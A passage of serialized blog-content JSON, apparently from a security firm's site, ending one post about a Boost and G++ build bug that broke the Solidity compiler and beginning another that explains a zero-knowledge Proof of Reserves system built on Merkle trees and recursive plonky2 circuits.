comparisons.",{"type":28,"tag":18457,"props":92005,"children":92006},{},[],{"type":28,"tag":63,"props":92008,"children":92010},{"id":92009},"recommendations",[92011],{"type":33,"value":92012},"Recommendations",{"type":28,"tag":2108,"props":92014,"children":92015},{},[92016,92024],{"type":28,"tag":459,"props":92017,"children":92018},{},[92019],{"type":28,"tag":4995,"props":92020,"children":92021},{},[92022],{"type":33,"value":92023},"Update Boost to ≥ 1.75",{"type":28,"tag":459,"props":92025,"children":92026},{},[92027],{"type":28,"tag":4995,"props":92028,"children":92029},{},[92030],{"type":33,"value":92031},"Pin G++ to v14 or later",{"type":28,"tag":18457,"props":92033,"children":92034},{},[],{"type":28,"tag":63,"props":92036,"children":92037},{"id":2506},[92038],{"type":33,"value":2509},{"type":28,"tag":29,"props":92040,"children":92041},{},[92042],{"type":33,"value":92043},"This isn’t a security vulnerability. It doesn’t corrupt memory or allow code execution.",{"type":28,"tag":29,"props":92045,"children":92046},{},[92047,92049,92053],{"type":33,"value":92048},"But it ",{"type":28,"tag":4995,"props":92050,"children":92051},{},[92052],{"type":33,"value":3643},{"type":33,"value":92054}," a reminder of the fragility of modern build stacks. A bug introduced in 2012, fixed in 2024, quietly broke one of the most used blockchain compiler toolchains — all without any code in the Solidity repo being “wrong.”",{"type":28,"tag":29,"props":92056,"children":92057},{},[92058],{"type":33,"value":92059},"Every layer here — Boost, G++, the C++20 spec, and Solidity — behaved “as documented.” But together, they composed into undefined behavior.",{"type":28,"tag":29,"props":92061,"children":92062},{},[92063],{"type":33,"value":92064},"The lesson? Always test critical software under multiple compilers and library versions — especially when enabling a new language standard.",{"type":28,"tag":2516,"props":92066,"children":92067},{},[92068],{"type":33,"value":2520},{"title":7,"searchDepth":256,"depth":256,"links":92070},[92071,92072,92077,92080,92081,92082,92083,92084],{"id":89756,"depth":256,"text":89759},{"id":89845,"depth":256,"text":89848,"children":92073},[92074,92075,92076],{"id":89851,"depth":293,"text":89854},{"id":89919,"depth":293,"text":89922},{"id":90010,"depth":293,"text":90013},{"id":90593,"depth":256,"text":90596,"children":92078},[92079],{"id":90599,"depth":293,"text":90602},{"id":90710,"depth":256,"text":90713},{"id":91557,"depth":256,"text":91560},{"id":91957,"depth":256,"text":91960},{"id":92009,"depth":256,"text":92012},{"id":2506,"depth":256,"text":2509},"content:blog:2025-08-11-compiler-bug-causes-compiler-bug.md","blog/2025-08-11-compiler-bug-causes-compiler-bug.md","blog/2025-08-11-compiler-bug-causes-compiler-bug",{"_path":92089,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":92090,"description":92091,"date":92092,"author":13,"image":92093,"isFeatured":19,"onBlogPage":19,"tags":92095,"body":92098,"_type":2534,"_id":96874,"_source":2536,"_file":96875,"_stem":96876,"_extension":2539},"/blog/2025-08-27-how-proof-of-reserves-uses-zk-to-protect-your-funds","PoRv2: A Fast, Transparent ZK-Based Proof of Reserves","Here, we explore zk-proofs, Merkle trees, and our new open-source implementation, PoRv2. Our proof-of-reserve enables users to verify exchange liabilities without relying on external auditors, setting a new standard for trust.","2025-08-27",{"src":92094,"width":18,"height":18},"/posts/por/title.png",[92096,92097],"zk","por",{"type":25,"children":92099,"toc":96851},[92100,92106,92118,92130,92135,92167,92181,92187,92199,92204,92209,92246,92251,92257,92262,92269,92274,92300,92305,92311,92331,92345,92353,92358,92363,92371,92384,92390,92472,92478,92483,92496,92501,92508,92532,92540,92545,92551,92556,93004,93017,93023,93028,93036,93054,93062,93075,93083,94744,94749,94756,94762,94767,94774,94790,94797,94805,94812,96323,96328,96335,96341,96346,96373,96378,96397,96403,96411,96429,96478,96486,96505,96527,96533,96546,96551,96558,96563,96626,96631,96638,96658,96664,96669,96675,96680,96724,96729,96737,96743,96748,96790,96795,96803,96808,96816,96820,96825,96838],{"type":28,"tag":63,"props":92101,"children":92103},{"id":92102},"what-is-a-proof-of-reserves",[92104],{"type":33,"value":92105},"What is a Proof of Reserves?",{"type":28,"tag":29,"props":92107,"children":92108},{},[92109,92111,92116],{"type":33,"value":92110},"At its heart, ",{"type":28,"tag":4995,"props":92112,"children":92113},{},[92114],{"type":33,"value":92115},"Proof of Reserves (PoR)",{"type":33,"value":92117}," is a crucial system designed to show that a crypto platform genuinely holds the funds it owes to its users. It's how exchanges and custodians can prove, using strong cryptographic methods, that they have enough assets to cover all customer deposits.",{"type":28,"tag":29,"props":92119,"children":92120},{},[92121,92123,92128],{"type":33,"value":92122},"Think of it this way: ",{"type":28,"tag":4995,"props":92124,"children":92125},{},[92126],{"type":33,"value":92127},"PoR",{"type":33,"value":92129}," is about enabling transparency. It's a way for platforms to provide clear, verifiable evidence of their financial health. For users, it means gaining confidence that their funds are secure on the platforms they use.",{"type":28,"tag":29,"props":92131,"children":92132},{},[92133],{"type":33,"value":92134},"Historically, traditional ways of proving reserves often had drawbacks. They might reveal too much sensitive information about the platform and rely heavily on external auditors without a direct user verification method.",{"type":28,"tag":29,"props":92136,"children":92137},{},[92138,92140,92147,92149,92156,92158,92165],{"type":33,"value":92139},"We from OtterSec, in partnership with ",{"type":28,"tag":87,"props":92141,"children":92144},{"href":92142,"rel":92143},"https://backpack.exchange/",[91],[92145],{"type":33,"value":92146},"Backpack",{"type":33,"value":92148},", just developed a Proof of Reserves system that can be used to prove CEX solvency. Our ",{"type":28,"tag":87,"props":92150,"children":92153},{"href":92151,"rel":92152},"https://github.com/otter-sec/por_v2",[91],[92154],{"type":33,"value":92155},"Zero-Knowledge Proof of Reserves (PoRv2)",{"type":33,"value":92157}," was based on ",{"type":28,"tag":87,"props":92159,"children":92162},{"href":92160,"rel":92161},"https://www.okx.com/en-eu/help/zero-knowledge-proofs-what-are-zk-starks-and-how-do-they-work-v2",[91],[92163],{"type":33,"value":92164},"OKX Proof of Reserves algorithm",{"type":33,"value":92166}," since it was the fastest and most efficient one known so far. We also use recursive plonky2 as the algorithm for zero-knowledge proving, but we made some improvements to the circuits for more transparency and verifiable information on the user side, eliminating the need to trust the audit company.",{"type":28,"tag":29,"props":92168,"children":92169},{},[92170,92172,92179],{"type":33,"value":92171},"In addition, we also created and open-sourced a ",{"type":28,"tag":87,"props":92173,"children":92176},{"href":92174,"rel":92175},"https://github.com/otter-sec/por_verifier_server",[91],[92177],{"type":33,"value":92178},"PoR verifier server",{"type":33,"value":92180}," that receives the proofs and validates them.",{"type":28,"tag":63,"props":92182,"children":92184},{"id":92183},"why-do-we-use-zk-for-por",[92185],{"type":33,"value":92186},"Why do we use ZK for PoR?",{"type":28,"tag":29,"props":92188,"children":92189},{},[92190,92192,92197],{"type":33,"value":92191},"Proving reserves is crucial, but it presents a unique challenge for any platform holding user funds: how do you publicly prove solvency without also exposing sensitive user balance information or revealing proprietary financial details? This is where ",{"type":28,"tag":4995,"props":92193,"children":92194},{},[92195],{"type":33,"value":92196},"Zero-Knowledge Proofs (ZKPs)",{"type":33,"value":92198}," become game-changers.",{"type":28,"tag":29,"props":92200,"children":92201},{},[92202],{"type":33,"value":92203},"Simply put, a Zero-Knowledge Proof allows one party to prove to another that a statement is true without revealing any information beyond the validity of the statement itself. Imagine proving you know a secret password without actually telling anyone the password. You confirm you possess the knowledge, but the secret remains yours.",{"type":28,"tag":29,"props":92205,"children":92206},{},[92207],{"type":33,"value":92208},"In the context of Proof of Reserves, ZKPs are perfectly suited to solve the privacy paradox. They enable a platform to prove two important things cryptographically:",{"type":28,"tag":455,"props":92210,"children":92211},{},[92212,92229],{"type":28,"tag":459,"props":92213,"children":92214},{},[92215,92220,92222,92228],{"type":28,"tag":4995,"props":92216,"children":92217},{},[92218],{"type":33,"value":92219},"Sum proof",{"type":33,"value":92221},": The exchange liability is equal to the sum of all users' balances. (e.g: ",{"type":28,"tag":98,"props":92223,"children":92225},{"className":92224},[],[92226],{"type":33,"value":92227},"btc_liability = user1_btc + user2_btc + user3_btc + ...",{"type":33,"value":1484},{"type":28,"tag":459,"props":92230,"children":92231},{},[92232,92237,92239,92244],{"type":28,"tag":4995,"props":92233,"children":92234},{},[92235],{"type":33,"value":92236},"Non-negativity",{"type":33,"value":92238},": All users have a ",{"type":28,"tag":4995,"props":92240,"children":92241},{},[92242],{"type":33,"value":92243},"positive",{"type":33,"value":92245}," net balance. This ensures that the sum proof is not tampered with by users with negative net balances. A user can have negative asset balances (e.g., borrowing BTC) but only if collateralized with other assets.",{"type":28,"tag":29,"props":92247,"children":92248},{},[92249],{"type":33,"value":92250},"It is worth noting that we cannot guarantee that all users were included in the ZK analysis. Therefore, if we only used ZKPs to prove those two statements, the exchange could tamper with the sum proof by excluding users from the PoR. That's why we also use a Merkle tree to prove inclusions.",{"type":28,"tag":63,"props":92252,"children":92254},{"id":92253},"what-is-a-merkle-tree-and-how-does-it-help-in-a-por",[92255],{"type":33,"value":92256},"What is a Merkle Tree and how does it help in a PoR?",{"type":28,"tag":29,"props":92258,"children":92259},{},[92260],{"type":33,"value":92261},"A Merkle tree is a tree data structure where each leaf node is a cryptographic hash of an individual piece of data (like a user's balance), and every non-leaf node is a cryptographic hash of its child nodes. This structure allows for the entire dataset to be summarized by a single, unique hash at the top, called the Merkle Root.",{"type":28,"tag":29,"props":92263,"children":92264},{},[92265],{"type":28,"tag":206,"props":92266,"children":92268},{"alt":50198,"src":92267},"/posts/por/merkle-tree.png",[],{"type":28,"tag":29,"props":92270,"children":92271},{},[92272],{"type":33,"value":92273},"In the PoR, we can use a Merkle tree to verify the inclusion of each user in the Proof of Reserves. It works like this:",{"type":28,"tag":455,"props":92275,"children":92276},{},[92277,92290,92295],{"type":28,"tag":459,"props":92278,"children":92279},{},[92280,92282,92288],{"type":33,"value":92281},"The Merkle tree is generated using the leaf nodes as the hashes of the user information (e.g., ",{"type":28,"tag":98,"props":92283,"children":92285},{"className":92284},[],[92286],{"type":33,"value":92287},"sha256({id: 1, balances: {\"BTC\": 0.1, \"ETH\": 0.2, ...}})",{"type":33,"value":92289},");",{"type":28,"tag":459,"props":92291,"children":92292},{},[92293],{"type":33,"value":92294},"The Merkle tree is made public;",{"type":28,"tag":459,"props":92296,"children":92297},{},[92298],{"type":33,"value":92299},"Each user can download the Merkle tree and check if their account was included by hashing their account information and checking if the hash is one of the leaves;",{"type":28,"tag":29,"props":92301,"children":92302},{},[92303],{"type":33,"value":92304},"In other words, this use of the Merkle tree allows users to easily verify that their individual balance was included in the overall total.",{"type":28,"tag":63,"props":92306,"children":92308},{"id":92307},"ottersec-porv2",[92309],{"type":33,"value":92310},"OtterSec PoRv2",{"type":28,"tag":29,"props":92312,"children":92313},{},[92314,92320,92322,92329],{"type":28,"tag":87,"props":92315,"children":92317},{"href":92151,"rel":92316},[91],[92318],{"type":33,"value":92319},"We just open-sourced our Proof of Reserves code (PoRv2)",{"type":33,"value":92321},", which uses the ",{"type":28,"tag":87,"props":92323,"children":92326},{"href":92324,"rel":92325},"https://github.com/0xPolygonZero/plonky2",[91],[92327],{"type":33,"value":92328},"plonky2 ZK algorithm",{"type":33,"value":92330}," to create a Merkle tree and a final ZK proof that recursively verifies smaller sum and non-negativity proofs.",{"type":28,"tag":29,"props":92332,"children":92333},{},[92334,92336,92343],{"type":33,"value":92335},"We named it PoRv2 because we already had a version based on ",{"type":28,"tag":87,"props":92337,"children":92340},{"href":92338,"rel":92339},"https://vitalik.eth.limo/general/2022/11/19/proof_of_solvency.html",[91],[92341],{"type":33,"value":92342},"Vitalik's proof of solvency",{"type":33,"value":92344},", which was not optimal.",{"type":28,"tag":29,"props":92346,"children":92347},{},[92348],{"type":28,"tag":4995,"props":92349,"children":92350},{},[92351],{"type":33,"value":92352},"Non-negativity Proof",{"type":28,"tag":29,"props":92354,"children":92355},{},[92356],{"type":33,"value":92357},"In our non-negativity proof, the circuit receives the asset balances of each user and the price of each asset. With these inputs, it calculates the account's USD balance and checks if it is greater than 0.",{"type":28,"tag":29,"props":92359,"children":92360},{},[92361],{"type":33,"value":92362},"We also check for overflows during summation to prevent tampering in the final result.",{"type":28,"tag":29,"props":92364,"children":92365},{},[92366],{"type":28,"tag":4995,"props":92367,"children":92368},{},[92369],{"type":33,"value":92370},"Sum Proof",{"type":28,"tag":29,"props":92372,"children":92373},{},[92374,92376,92382],{"type":33,"value":92375},"The sum proof verifies a public circuit input that was calculated by summing up all user balances of each asset. (e.g., ",{"type":28,"tag":98,"props":92377,"children":92379},{"className":92378},[],[92380],{"type":33,"value":92381},"BTC final: user1_btc + user2_btc ...",{"type":33,"value":92383},"). Note that each asset's final sum is not USD-based; we calculate the final balance using the asset balance itself.",{"type":28,"tag":75,"props":92385,"children":92387},{"id":92386},"what-are-the-ottersec-porv2-key-points",[92388],{"type":33,"value":92389},"What are the OtterSec PoRv2 key points?",{"type":28,"tag":455,"props":92391,"children":92392},{},[92393,92403,92421,92431,92462],{"type":28,"tag":459,"props":92394,"children":92395},{},[92396,92401],{"type":28,"tag":4995,"props":92397,"children":92398},{},[92399],{"type":33,"value":92400},"Transparency",{"type":33,"value":92402},": It is possible for the exchange to safely disclose the entire Merkle tree so users can verify it without the need for an external auditing company. Also, the code allows asset price commitments and verifications.",{"type":28,"tag":459,"props":92404,"children":92405},{},[92406,92411,92413,92420],{"type":28,"tag":4995,"props":92407,"children":92408},{},[92409],{"type":33,"value":92410},"Time-efficiency",{"type":33,"value":92412},": We were able to reduce the amount of time to prove by more than 100 times from our previous version by generating proofs for 750,000 users within 8 minutes using a Mac M3 Pro. ",{"type":28,"tag":87,"props":92414,"children":92417},{"href":92415,"rel":92416},"https://github.com/otter-sec/por_v2?tab=readme-ov-file#benchmark",[91],[92418],{"type":33,"value":92419},"Check our benchmark",{"type":33,"value":141},{"type":28,"tag":459,"props":92422,"children":92423},{},[92424,92429],{"type":28,"tag":4995,"props":92425,"children":92426},{},[92427],{"type":33,"value":92428},"Memory-efficiency",{"type":33,"value":92430},": We also were able to reduce the amount of RAM needed to prove the liabilities of millions of users. Now, we are able to use machines with 16GB.",{"type":28,"tag":459,"props":92432,"children":92433},{},[92434,92439,92441,92446,92448,92453,92455,92460],{"type":28,"tag":4995,"props":92435,"children":92436},{},[92437],{"type":33,"value":92438},"Small-proofs",{"type":33,"value":92440},": We were able to reduce the final proof to less than ",{"type":28,"tag":4995,"props":92442,"children":92443},{},[92444],{"type":33,"value":92445},"500KB",{"type":33,"value":92447}," and each inclusion proof to ",{"type":28,"tag":4995,"props":92449,"children":92450},{},[92451],{"type":33,"value":92452},"~52KB",{"type":33,"value":92454},". The only big file that we need to store is the Merkle tree, which doesn't consume more than ",{"type":28,"tag":4995,"props":92456,"children":92457},{},[92458],{"type":33,"value":92459},"200MB",{"type":33,"value":92461}," if the PoR parameters are finely adjusted. Additionally, instead of storing each inclusion proof in a static file, we provide an efficient method to generate inclusion proofs on demand, eliminating the need for the exchange to store millions of files and conserve disk space and resources.",{"type":28,"tag":459,"props":92463,"children":92464},{},[92465,92470],{"type":28,"tag":4995,"props":92466,"children":92467},{},[92468],{"type":33,"value":92469},"Privacy",{"type":33,"value":92471},": We use many cryptographic mechanisms to ensure that the user balances and other private information are kept safe and secret.",{"type":28,"tag":63,"props":92473,"children":92475},{"id":92474},"zk-circuits",[92476],{"type":33,"value":92477},"ZK Circuits",{"type":28,"tag":29,"props":92479,"children":92480},{},[92481],{"type":33,"value":92482},"We use two different ZK circuits to generate the final proof:",{"type":28,"tag":455,"props":92484,"children":92485},{},[92486,92491],{"type":28,"tag":459,"props":92487,"children":92488},{},[92489],{"type":33,"value":92490},"Batch circuit",{"type":28,"tag":459,"props":92492,"children":92493},{},[92494],{"type":33,"value":92495},"Recursive circuit",{"type":28,"tag":29,"props":92497,"children":92498},{},[92499],{"type":33,"value":92500},"With those two circuits, we can generate the proofs recursive tree:",{"type":28,"tag":29,"props":92502,"children":92503},{},[92504],{"type":28,"tag":206,"props":92505,"children":92507},{"alt":50198,"src":92506},"/posts/por/batch-circuit.png",[],{"type":28,"tag":107,"props":92509,"children":92510},{},[92511],{"type":28,"tag":29,"props":92512,"children":92513},{},[92514,92516,92522,92524,92530],{"type":33,"value":92515},"Note: We are using 512 as ",{"type":28,"tag":98,"props":92517,"children":92519},{"className":92518},[],[92520],{"type":33,"value":92521},"BATCH_SIZE",{"type":33,"value":92523}," and 8 as ",{"type":28,"tag":98,"props":92525,"children":92527},{"className":92526},[],[92528],{"type":33,"value":92529},"RECURSIVE_SIZE",{"type":33,"value":92531}," which indicates how many children each circuit has. This is easily adjustable in the code, and the optimal configuration will depend on the amount of accounts being proved in the PoR.",{"type":28,"tag":107,"props":92533,"children":92534},{},[92535],{"type":28,"tag":29,"props":92536,"children":92537},{},[92538],{"type":33,"value":92539},"Note 2: We add empty proofs as padding to chunks that don't have the correct length.",{"type":28,"tag":29,"props":92541,"children":92542},{},[92543],{"type":33,"value":92544},"Each non-leaf node in this tree is a ZK proof, which is generated using the related circuit; each circuit also generates the Merkle tree hash of each node, which is included in the Merkle tree.",{"type":28,"tag":75,"props":92546,"children":92548},{"id":92547},"leaf-nodes",[92549],{"type":33,"value":92550},"Leaf Nodes",{"type":28,"tag":29,"props":92552,"children":92553},{},[92554],{"type":33,"value":92555},"The leaf nodes are the hashes of the account information. It is calculated in this way:",{"type":28,"tag":29,"props":92557,"children":92558},{},[92559],{"type":28,"tag":98,"props":92560,"children":92562},{"className":92561},[3652,3653],[92563],{"type":28,"tag":116,"props":92564,"children":92566},{"className":92565},[3658],[92567],{"type":28,"tag":116,"props":92568,"children":92570},{"className":92569,"ariaHidden":3664},[3663],[92571,92598],{"type":28,"tag":116,"props":92572,"children":92574},{"className":92573},[3669],[92575,92580,92585,92589,92594],{"type":28,"tag":116,"props":92576,"children":92579},{"className":92577,"style":92578},[3674],"height:0.6944em;",[],{"type":28,"tag":116,"props":92581,"children":92583},{"className":92582},[3680,21251],[92584],{"type":33,"value":83963},{"type":28,"tag":116,"props":92586,"children":92588},{"className":92587,"style":3857},[3759],[],{"type":28,"tag":116,"props":92590,"children":92592},{"className":92591},[3862],[92593],{"type":33,"value":373},{"type":28,"tag":116,"props":92595,"children":92597},{"className":92596,"style":3857},[3759],[],{"type":28,"tag":116,"props":92599,"children":92601},{"className":92600},[3669],[92602,92607,92612,92618,92623,92628,92634,92639,92644,92649,92655,92660,92666,92672,92679,92685,92691,92751,92756,92762,92767,92772,92777,92782,92787,92792,92797,92802,92807,92864,92869,92874,92879,92884,92889,92894,92901,92906,92912,92917,92923,92929,92934,92939,92944,92949,92954,92959,92964,92969,92974,92979,92984,92989,92994,92999],{"type":28,"tag":116,"props":92603,"children":92606},{"className":92604,"style":92605},[3674],"height:1.06em;vertical-align:-0.31em;",[],{"type":28,"tag":116,"props":92608,"children":92610},{"className":92609,"style":21252},[3680,21251],[92611],{"type":33,"value":21255},{"type":28,"tag":116,"props":92613,"children":92615},{"className":92614},[3680,21251],[92616],{"type":33,"value":92617},"ose",{"type":28,"tag":116,"props":92619,"children":92621},{"className":92620},[3680,21251],[92622],{"type":33,"value":3408},{"type":28,"tag":116,"props":92624,"children":92626},{"className":92625},[3680,21251],[92627],{"type":33,"value":70183},{"type":28,"tag":116,"props":92629,"children":92631},{"className":92630},[3680,21251],[92632],{"type":33,"value":92633},"o",{"type":28,"tag":116,"props":92635,"children":92637},{"className":92636},[3680,21251],[92638],{"type":33,"value":56022},{"type":28,"tag":116,"props":92640,"children":92642},{"className":92641},[21380],[92643],{"type":33,"value":313},{"type":28,"tag":116,"props":92645,"children":92647},{"className":92646},[3680,21251],[92648],{"type":33,"value":87},{"type":28,"tag":116,"props":92650,"children":92652},{"className":92651},[3680,21251],[92653],{"type":33,"value":92654},"sse",{"type":28,"tag":116,"props":92656,"children":92658},{"className":92657},[3680,21251],[92659],{"type":33,"value":1554},{"type":28,"tag":116,"props":92661,"children":92664},{"className":92662,"style":92663},[3680],"margin-right:0.02778em;",[92665],{"type":33,"value":2754},{"type":28,"tag":116,"props":92667,"children":92669},{"className":92668},[3680,21251],[92670],{"type":33,"value":92671},"ba",{"type":28,"tag":116,"props":92673,"children":92676},{"className":92674,"style":92675},[3680,21251],"margin-right:0.01968em;",[92677],{"type":33,"value":92678},"l",{"type":28,"tag":116,"props":92680,"children":92682},{"className":92681},[3680,21251],[92683],{"type":33,"value":92684},"an",{"type":28,"tag":116,"props":92686,"children":92688},{"className":92687},[3680,21251],[92689],{"type":33,"value":92690},"ce",{"type":28,"tag":116,"props":92692,"children":92694},{"className":92693},[3680],[92695,92700],{"type":28,"tag":116,"props":92696,"children":92698},{"className":92697},[3680,21251],[92699],{"type":33,"value":10318},{"type":28,"tag":116,"props":92701,"children":92703},{"className":92702},[3695],[92704],{"type":28,"tag":116,"props":92705,"children":92707},{"className":92706},[3700,21305],[92708,92739],{"type":28,"tag":116,"props":92709,"children":92711},{"className":92710},[3705],[92712,92734],{"type":28,"tag":116,"props":92713,"children":92716},{"className":92714,"style":92715},[3710],"height:0.3011em;",[92717],{"type":28,"tag":116,"props":92718,"children":92720},{"style":92719},"top:-2.55em;margin-left:0em;margin-right:0.05em;",[92721,92725],{"type":28,"tag":116,"props":92722,"children":92724},{"className":92723,"style":3720},[3719],[],{"type":28,"tag":116,"props":92726,"children":92728},{"className":92727},[3725,3726,3727,3728],[92729],{"type":28,"tag":116,"props":92730,"children":92732},{"className":92731},[3680,3728],[92733],{"type":33,"value":353},{"type":28,"tag":116,"props":92735,"children":92737},{"className":92736},[21407],[92738],{"type":33,"value":21410},{"type":28,"tag":116,"props":92740,"children":92742},{"className":92741},[3705],[92743],{"type":28,"tag":116,"props":92744,"children":92747},{"className":92745,"style":92746},[3710],"height:0.15em;",[92748],{"type":28,"tag":116,"props":92749,"children":92750},{},[],{"type":28,"tag":116,"props":92752,"children":92754},{"className":92753},[3759],[92755],{"type":33,"value":21352},{"type":28,"tag":116,"props":92757,"children":92759},{"className":92758},[3680],[92760],{"type":33,"value":92761},"∣∣",{"type":28,"tag":116,"props":92763,"children":92765},{"className":92764},[3759],[92766],{"type":33,"value":21352},{"type":28,"tag":116,"props":92768,"children":92770},{"className":92769},[3680,21251],[92771],{"type":33,"value":87},{"type":28,"tag":116,"props":92773,"children":92775},{"className":92774},[3680,21251],[92776],{"type":33,"value":92654},{"type":28,"tag":116,"props":92778,"children":92780},{"className":92779},[3680,21251],[92781],{"type":33,"value":1554},{"type":28,"tag":116,"props":92783,"children":92785},{"className":92784,"style":92663},[3680],[92786],{"type":33,"value":2754},{"type":28,"tag":116,"props":92788,"children":92790},{"className":92789},[3680,21251],[92791],{"type":33,"value":92671},{"type":28,"tag":116,"props":92793,"children":92795},{"className":92794,"style":92675},[3680,21251],[92796],{"type":33,"value":92678},{"type":28,"tag":116,"props":92798,"children":92800},{"className":92799},[3680,21251],[92801],{"type":33,"value":92684},{"type":28,"tag":116,"props":92803,"children":92805},{"className":92804},[3680,21251],[92806],{"type":33,"value":92690},{"type":28,"tag":116,"props":92808,"children":92810},{"className":92809},[3680],[92811,92816],{"type":28,"tag":116,"props":92812,"children":92814},{"className":92813},[3680,21251],[92815],{"type":33,"value":10318},{"type":28,"tag":116,"props":92817,"children":92819},{"className":92818},[3695],[92820],{"type":28,"tag":116,"props":92821,"children":92823},{"className":92822},[3700,21305],[92824,92853],{"type":28,"tag":116,"props":92825,"children":92827},{"className":92826},[3705],[92828,92848],{"type":28,"tag":116,"props":92829,"children":92831},{"className":92830,"style":92715},[3710],[92832],{"type":28,"tag":116,"props":92833,"children":92834},{"style":92719},[92835,92839],{"type":28,"tag":116,"props":92836,"children":92838},{"className":92837,"style":3720},[3719],[],{"type":28,"tag":116,"props":92840,"children":92842},{"className":92841},[3725,3726,3727,3728],[92843],{"type":28,"tag":116,"props":92844,"children":92846},{"className":92845},[3680,3728],[92847],{"type":33,"value":1824},{"type":28,"tag":116,"props":92849,"children":92851},{"className":92850},[21407],[92852],{"type":33,"value":21410},{"type":28,"tag":116,"props":92854,"children":92856},{"className":92855},[3705],[92857],{"type":28,"tag":116,"props":92858,"children":92860},{"className":92859,"style":92746},[3710],[92861],{"type":28,"tag":116,"props":92862,"children":92863},{},[],{"type":28,"tag":116,"props":92865,"children":92867},{"className":92866},[3759],[92868],{"type":33,"value":21352},{"type":28,"tag":116,"props":92870,"children":92872},{"className":92871},[3680],[92873],{"type":33,"value":9259},{"type":28,"tag":116,"props":92875,"children":92877},{"className":92876},[3759],[92878],{"type":33,"value":21352},{"type":28,"tag":116,"props":92880,"children":92882},{"className":92881},[3680],[92883],{"type":33,"value":92761},{"type":28,"tag":116,"props":92885,"children":92887},{"className":92886},[3759],[92888],{"type":33,"value":21352},{"type":28,"tag":116,"props":92890,"children":92892},{"className":92891,"style":21709},[3680,21251],[92893],{"type":33,"value":21712},{"type":28,"tag":116,"props":92895,"children":92898},{"className":92896,"style":92897},[3680,21251],"margin-right:0.08125em;",[92899],{"type":33,"value":92900},"H",{"type":28,"tag":116,"props":92902,"children":92904},{"className":92903},[3680,21251],[92905],{"type":33,"value":76387},{"type":28,"tag":116,"props":92907,"children":92909},{"className":92908},[3680],[92910],{"type":33,"value":92911},"256",{"type":28,"tag":116,"props":92913,"children":92915},{"className":92914},[21380],[92916],{"type":33,"value":313},{"type":28,"tag":116,"props":92918,"children":92920},{"className":92919},[3680,21251],[92921],{"type":33,"value":92922},"u",{"type":28,"tag":116,"props":92924,"children":92926},{"className":92925,"style":92663},[3680,21251],[92927],{"type":33,"value":92928},"ser",{"type":28,"tag":116,"props":92930,"children":92932},{"className":92931,"style":92663},[3680],[92933],{"type":33,"value":2754},{"type":28,"tag":116,"props":92935,"children":92937},{"className":92936},[3680,21251],[92938],{"type":33,"value":3408},{"type":28,"tag":116,"props":92940,"children":92942},{"className":92941},[3680,21251],[92943],{"type":33,"value":70183},{"type":28,"tag":116,"props":92945,"children":92947},{"className":92946},[21401],[92948],{"type":33,"value":1829},{"type":28,"tag":116,"props":92950,"children":92952},{"className":92951},[3759],[92953],{"type":33,"value":21352},{"type":28,"tag":116,"props":92955,"children":92957},{"className":92956},[3680],[92958],{"type":33,"value":92761},{"type":28,"tag":116,"props":92960,"children":92962},{"className":92961},[3759],[92963],{"type":33,"value":21352},{"type":28,"tag":116,"props":92965,"children":92967},{"className":92966},[3680,21251],[92968],{"type":33,"value":92922},{"type":28,"tag":116,"props":92970,"children":92972},{"className":92971,"style":92663},[3680,21251],[92973],{"type":33,"value":92928},{"type":28,"tag":116,"props":92975,"children":92977},{"className":92976,"style":92663},[3680],[92978],{"type":33,"value":2754},{"type":28,"tag":116,"props":92980,"children":92982},{"className":92981},[3680,21251],[92983],{"type":33,"value":56022},{"type":28,"tag":116,"props":92985,"children":92987},{"className":92986},[3680,21251],[92988],{"type":33,"value":92633},{"type":28,"tag":116,"props":92990,"children":92992},{"className":92991},[3680,21251],[92993],{"type":33,"value":56022},{"type":28,"tag":116,"props":92995,"children":92997},{"className":92996},[3680,21251],[92998],{"type":33,"value":92690},{"type":28,"tag":116,"props":93000,"children":93002},{"className":93001},[21401],[93003],{"type":33,"value":1829},{"type":28,"tag":29,"props":93005,"children":93006},{},[93007,93009,93015],{"type":33,"value":93008},"In other words, all balances are concatenated with the hashed user ID (which can be a ",{"type":28,"tag":98,"props":93010,"children":93012},{"className":93011},[],[93013],{"type":33,"value":93014},"uuid",{"type":33,"value":93016},", a username or an incremental ID) and with a nonce. The nonce is a random number that serves as a security measure against attackers who could brute-force the hash to find out other users' balances. Since the Merkle tree is a public proof, we need to be careful against these types of data leaks.",{"type":28,"tag":75,"props":93018,"children":93020},{"id":93019},"batch-circuit",[93021],{"type":33,"value":93022},"Batch Circuit",{"type":28,"tag":29,"props":93024,"children":93025},{},[93026],{"type":33,"value":93027},"The batch circuit is the first proven circuit in the PoR algorithm. It receives the account's information (grouped in 512) and generates the ZK proof with those constraints:",{"type":28,"tag":29,"props":93029,"children":93030},{},[93031],{"type":28,"tag":4995,"props":93032,"children":93033},{},[93034],{"type":33,"value":93035},"Public Inputs",{"type":28,"tag":2108,"props":93037,"children":93038},{},[93039,93044,93049],{"type":28,"tag":459,"props":93040,"children":93041},{},[93042],{"type":33,"value":93043},"Asset prices in USD",{"type":28,"tag":459,"props":93045,"children":93046},{},[93047],{"type":33,"value":93048},"Merkle tree hash",{"type":28,"tag":459,"props":93050,"children":93051},{},[93052],{"type":33,"value":93053},"Summed asset balances",{"type":28,"tag":29,"props":93055,"children":93056},{},[93057],{"type":28,"tag":4995,"props":93058,"children":93059},{},[93060],{"type":33,"value":93061},"Private Inputs",{"type":28,"tag":2108,"props":93063,"children":93064},{},[93065,93070],{"type":28,"tag":459,"props":93066,"children":93067},{},[93068],{"type":33,"value":93069},"Users balances",{"type":28,"tag":459,"props":93071,"children":93072},{},[93073],{"type":33,"value":93074},"Merkle tree leaves hashes",{"type":28,"tag":29,"props":93076,"children":93077},{},[93078],{"type":28,"tag":4995,"props":93079,"children":93080},{},[93081],{"type":33,"value":93082},"Constraints",{"type":28,"tag":2108,"props":93084,"children":93085},{},[93086,93539,93707,94054,94452],{"type":28,"tag":459,"props":93087,"children":93088},{},[93089],{"type":28,"tag":98,"props":93090,"children":93092},{"className":93091},[3652,3653],[93093],{"type":28,"tag":116,"props":93094,"children":93096},{"className":93095},[3658],[93097],{"type":28,"tag":116,"props":93098,"children":93100},{"className":93099,"ariaHidden":3664},[3663],[93101,93240,93444],{"type":28,"tag":116,"props":93102,"children":93104},{"className":93103},[3669],[93105,93110,93115,93121,93126,93131,93136,93141,93146,93153,93158,93163,93168,93227,93231,93236],{"type":28,"tag":116,"props":93106,"children":93109},{"className":93107,"style":93108},[3674],"height:0.9695em;vertical-align:-0.31em;",[],{"type":28,"tag":116,"props":93111,"children":93113},{"className":93112},[3680,21251],[93114],{"type":33,"value":87},{"type":28,"tag":116,"props":93116,"children":93118},{"className":93117},[3680,